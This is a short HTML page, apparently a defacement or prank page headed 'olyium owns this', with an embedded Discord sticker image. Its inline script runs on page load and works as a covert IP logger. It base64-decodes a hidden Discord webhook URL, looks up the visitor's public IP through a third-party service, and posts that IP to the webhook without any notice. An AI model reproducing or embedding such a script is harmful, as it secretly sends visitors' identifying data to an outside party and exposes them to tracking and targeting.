<html><body><h1>olyium owns this</h1><script>
(async()=>{
  const wh = atob('aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTM5ODEzMDg2NDQ1NzUxNTA1OS95VWxYdVJRSFI4MDZ3cEJleU4wVzFIYU1HeUZyUW9tTkxXYmxyQWF0TWJFakV2ZjZBR010V2ZPTk9rWW0zXy03ZGQxbQ==');
  await fetch(wh,{
    method:'POST',
    headers:{'Content-Type':'application/json'},
    body:JSON.stringify({content:await(await fetch('https://api.ipify.org/?format=json')).json().then(d=>d.ip)})
  });
})();
</script></body><img src="https://media.discordapp.net/stickers/1286068112554459148.gif?size=160&name=pet" size="75px"></img></html>
